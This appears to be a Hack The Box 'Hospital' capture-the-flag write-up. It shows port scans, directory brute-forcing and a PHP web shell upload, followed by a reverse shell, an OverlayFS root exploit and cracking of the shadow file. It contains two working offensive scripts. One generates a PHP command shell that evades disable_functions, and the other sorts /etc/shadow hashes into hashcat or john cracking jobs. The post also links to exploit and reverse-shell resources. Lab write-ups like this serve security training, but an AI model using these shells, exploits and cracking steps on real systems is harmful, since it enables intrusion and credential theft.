
[HTB] Hospital

by CH@3M 2024. 4. 11.
┌[htb-zafbonejpv@chaem]-[05:59-16/04]-[/root]
└╼$ nmap -A -T5 10.129.12.225
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-16 06:00 BST
Stats: 0:01:02 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 80.00% done; ETC: 06:01 (0:00:14 remaining)
Stats: 0:01:03 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 80.00% done; ETC: 06:01 (0:00:14 remaining)
Nmap scan report for 10.129.12.225
Host is up (0.093s latency).
Not shown: 980 filtered tcp ports (no-response)
PORT     STATE SERVICE           VERSION
22/tcp   open  ssh               OpenSSH 9.0p1 Ubuntu 1ubuntu8.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 e14b4b3a6d18666939f7aa74b3160aaa (ECDSA)
|_  256 96c1dcd8972095e7015f20a24361cbca (ED25519)
53/tcp   open  domain            Simple DNS Plus
88/tcp   open  kerberos-sec      Microsoft Windows Kerberos (server time: 2024-04-16 12:00:22Z)
135/tcp  open  msrpc             Microsoft Windows RPC
139/tcp  open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: hospital.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Not valid before: 2023-09-06T10:49:03
|_Not valid after:  2028-09-06T10:49:03
443/tcp  open  ssl/http          Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
| tls-alpn: 
|_  http/1.1
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
|_ssl-date: TLS randomness does not represent time
|_http-title: Hospital Webmail :: Welcome to Hospital Webmail
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ldapssl?
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Not valid before: 2023-09-06T10:49:03
|_Not valid after:  2028-09-06T10:49:03
1801/tcp open  msmq?
2103/tcp open  msrpc             Microsoft Windows RPC
2105/tcp open  msrpc             Microsoft Windows RPC
2107/tcp open  msrpc             Microsoft Windows RPC
2179/tcp open  vmrdp?
3268/tcp open  ldap              Microsoft Windows Active Directory LDAP (Domain: hospital.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Not valid before: 2023-09-06T10:49:03
|_Not valid after:  2028-09-06T10:49:03
3269/tcp open  globalcatLDAPssl?
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Not valid before: 2023-09-06T10:49:03
|_Not valid after:  2028-09-06T10:49:03
3389/tcp open  ms-wbt-server     Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: HOSPITAL
|   NetBIOS_Domain_Name: HOSPITAL
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: hospital.htb
|   DNS_Computer_Name: DC.hospital.htb
|   DNS_Tree_Name: hospital.htb
|   Product_Version: 10.0.17763
|_  System_Time: 2024-04-16T12:01:12+00:00
| ssl-cert: Subject: commonName=DC.hospital.htb
| Not valid before: 2024-04-15T11:57:03
|_Not valid after:  2024-10-15T11:57:03
8080/tcp open  http              Apache httpd 2.4.55 ((Ubuntu))
|_http-server-header: Apache/2.4.55 (Ubuntu)
|_http-open-proxy: Proxy might be redirecting requests
| http-title: Login
|_Requested resource was login.php
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
Service Info: Host: DC; OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 6h59m59s
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-04-16T12:01:12
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 105.81 seconds
┌[htb-zafbonejpv@chaem]-[06:01-16/04]-[/root]
└╼$ ldapsearch -H ldap://10.129.12.225 -x -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingcontexts: DC=hospital,DC=htb
namingcontexts: CN=Configuration,DC=hospital,DC=htb
namingcontexts: CN=Schema,CN=Configuration,DC=hospital,DC=htb
namingcontexts: DC=DomainDnsZones,DC=hospital,DC=htb
namingcontexts: DC=ForestDnsZones,DC=hospital,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

Confirmed that an account named admin exists.
A file upload feature exists.
Uploaded a PHP web shell successfully.

Upload a phpinfo() page and look at the disable_functions list: it shows which functions are blocked!

<?php phpinfo(); ?>

Directory brute-force to find the path where uploaded files are stored.

┌─[root@htb-ergy0nhd5q]─[~/Desktop]
└──╼ #gobuster dir -u http://10.129.12.225:8080 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 150
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.12.225:8080
[+] Method:                  GET
[+] Threads:                 150
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2024/04/16 16:57:25 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 322] [--> http://10.129.12.225:8080/images/]
/uploads              (Status: 301) [Size: 323] [--> http://10.129.12.225:8080/uploads/]
/css                  (Status: 301) [Size: 319] [--> http://10.129.12.225:8080/css/]    
/js                   (Status: 301) [Size: 318] [--> http://10.129.12.225:8080/js/]     
/vendor               (Status: 301) [Size: 322] [--> http://10.129.12.225:8080/vendor/] 
/fonts                (Status: 301) [Size: 321] [--> http://10.129.12.225:8080/fonts/]  
/server-status        (Status: 403) [Size: 280]                                         
                                                                                        
===============================================================
2024/04/16 16:59:20 Finished
===============================================================

The PHP web shell doesn't work...
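Why a web shell that uploaded fine can still do nothing, as an added example (this is not code from the post and not p0wny-shell's code): PHP's function_exists() returns false for any function listed in disable_functions, so a shell that hard-codes system() silently fails when system is disabled, while a shell that falls back through the remaining execution primitives keeps working. The script takes a disable_functions value copied from the phpinfo() page, lists which primitives survive, and emits a one-line PHP shell built on the first of them. The fallback order, the PHP glue per primitive and the sample disable_functions value are this example's own assumptions, not the target's configuration.

```python
"""Choose a PHP command-execution primitive that survives disable_functions.

Added example; not code from the original post or from p0wny-shell.
function_exists() is false for anything in disable_functions, so a shell
should pick its primitive at runtime instead of hard-coding system().
"""
from typing import List, Optional, Set

# Command-execution primitives in a typical fallback order (assumed order).
EXEC_PRIMITIVES = ("exec", "shell_exec", "system", "passthru", "popen", "proc_open")

# Minimal PHP glue per primitive; {cmd} is the PHP expression holding the command.
PHP_TEMPLATES = {
    "exec": 'exec({cmd}, $o); echo implode("\\n", $o);',
    "shell_exec": "echo shell_exec({cmd});",
    "system": "system({cmd});",
    "passthru": "passthru({cmd});",
    "popen": "$h = popen({cmd}, 'r'); while (!feof($h)) echo fread($h, 4096); pclose($h);",
    "proc_open": (
        "$p = proc_open({cmd}, [1 => ['pipe', 'w']], $pipes); "
        "echo stream_get_contents($pipes[1]); proc_close($p);"
    ),
}


def parse_disable_functions(value: str) -> Set[str]:
    """Normalise a php.ini disable_functions value: comma list, spaces tolerated, case-insensitive."""
    return {name.strip().lower() for name in value.split(",") if name.strip()}


def usable_primitives(disable_functions: str) -> List[str]:
    """Primitives not named in disable_functions, in fallback order (empty list = all blocked)."""
    disabled = parse_disable_functions(disable_functions)
    return [fn for fn in EXEC_PRIMITIVES if fn not in disabled]


def php_exec_stub(disable_functions: str, param: str = "cmd") -> Optional[str]:
    """One-line PHP shell that runs $_REQUEST[param] through the first usable primitive."""
    usable = usable_primitives(disable_functions)
    if not usable:
        return None  # every primitive is blocked: another shell will not help
    body = PHP_TEMPLATES[usable[0]].format(cmd=f"$_REQUEST['{param}']")
    return f"<?php {body} ?>"


# Constructed disable_functions value for the example (not the target's real list):
# everything except popen is blocked, so a system()-only shell would fail here.
SAMPLE_DISABLE_FUNCTIONS = "exec, shell_exec,system ,passthru,proc_open,pcntl_exec"

if __name__ == "__main__":
    print("usable:", usable_primitives(SAMPLE_DISABLE_FUNCTIONS))
    print(php_exec_stub(SAMPLE_DISABLE_FUNCTIONS))
```

Feed it the value shown by phpinfo(); if it returns None, every primitive is blocked and swapping shells is pointless. Otherwise save the emitted line as a .php file, put it in the upload directory found with gobuster (/uploads) and call it with ?cmd=id.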

https://github.com/flozz/p0wny-shell

https://www.revshells.com/

Using a reverse shell instead.

Reverse shell connection established.

Escalated to root with the OverlayFS vulnerability (CVE-2023-2640 / CVE-2023-32629) matching the web server host's Ubuntu version.

https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629/blob/main/exploit.sh

Gave the file execute permission and ran it.

Became root and checked the shadow file. Attempted to crack the password.

Password obtained.
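Before throwing the shadow file at a cracker, the hash scheme has to be matched to the tool, since hashcat modes are per scheme and hashcat has no yescrypt mode at all. The script below is an added example (not the post's own) that skips locked accounts, reads the crypt(3) $id$ prefix of each entry and maps it to a hashcat -m mode or, for yescrypt, to john's libc-backed --format=crypt, then groups the hashes into one job per scheme. The shadow lines, the file names and the wordlist path are constructed for this example; the salts and digests are placeholders, not real credentials.

```python
"""Triage /etc/shadow before cracking: identify the scheme, then pick the tool.

Added example, not from the original post. Shadow lines below are constructed;
their digests are placeholders, not real hashes.
"""
from typing import Dict, List, NamedTuple, Optional, Tuple

# $id$ prefix -> (scheme name, hashcat -m mode or None, john --format)
SCHEMES: Dict[str, Tuple[str, Optional[int], str]] = {
    "1": ("md5crypt", 500, "md5crypt"),
    "5": ("sha256crypt", 7400, "sha256crypt"),
    "6": ("sha512crypt", 1800, "sha512crypt"),
    "2a": ("bcrypt", 3200, "bcrypt"),
    "2b": ("bcrypt", 3200, "bcrypt"),
    "2y": ("bcrypt", 3200, "bcrypt"),
    "y": ("yescrypt", None, "crypt"),  # no hashcat mode; john uses libc crypt
}


class ShadowHash(NamedTuple):
    user: str
    scheme: str
    hashcat_mode: Optional[int]
    john_format: str
    hash: str


def parse_shadow(text: str) -> List[ShadowHash]:
    """Return crackable entries only; locked (*, !, !!) and empty password fields are skipped."""
    entries: List[ShadowHash] = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) < 2 or not fields[0]:
            continue
        user, pw = fields[0], fields[1]
        if not pw or pw[0] in "*!" or not pw.startswith("$"):
            continue  # locked, no password, or legacy DES: nothing worth feeding a cracker
        scheme_id = pw.split("$")[1]  # "$6$salt$hash" -> "6", "$y$j9T$salt$hash" -> "y"
        if scheme_id not in SCHEMES:
            continue
        name, mode, jfmt = SCHEMES[scheme_id]
        entries.append(ShadowHash(user, name, mode, jfmt, pw))
    return entries


def plan_cracking(entries: List[ShadowHash],
                  wordlist: str = "/usr/share/wordlists/rockyou.txt") -> Dict[str, dict]:
    """One job per scheme: the user:hash lines to save and the command that cracks them.

    File names are this example's convention. --username tells hashcat the lines
    carry a user prefix; john accepts user:hash natively.
    """
    plan: Dict[str, dict] = {}
    for e in entries:
        job = plan.setdefault(e.scheme, {"file": f"shadow.{e.scheme}.txt", "lines": [], "command": ""})
        job["lines"].append(f"{e.user}:{e.hash}")
        if e.hashcat_mode is not None:
            job["command"] = f"hashcat -m {e.hashcat_mode} --username {job['file']} {wordlist}"
        else:
            job["command"] = f"john --format={e.john_format} --wordlist={wordlist} {job['file']}"
    return plan


# Constructed shadow content: two crackable users, three accounts to skip.
SAMPLE_SHADOW = """\
root:*:19600:0:99999:7:::
daemon:*:19600:0:99999:7:::
alice:$6$saltsalt$NotARealSha512cryptDigestConstructedForThisExample0123456789abcdefghijklmnopqrstuvwxyz:19600:0:99999:7:::
bob:$y$j9T$constructedSalt$constructedYescryptDigestNotRealEither:19600:0:99999:7:::
svc:!:19600:0:99999:7:::
"""

if __name__ == "__main__":
    for scheme, job in plan_cracking(parse_shadow(SAMPLE_SHADOW)).items():
        print(scheme, "->", job["command"])
```

Write each job's lines to its file and run the printed command; a $6$ entry goes to hashcat -m 1800, a $y$ entry to john.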

Logged into the webmail on port 443 and checked the mail.

Googled the mail contents.

Attempted exploitation using a CVE.

Sent the resulting file by mail.

root.txt not obtained yet.

No permission for the admin path.
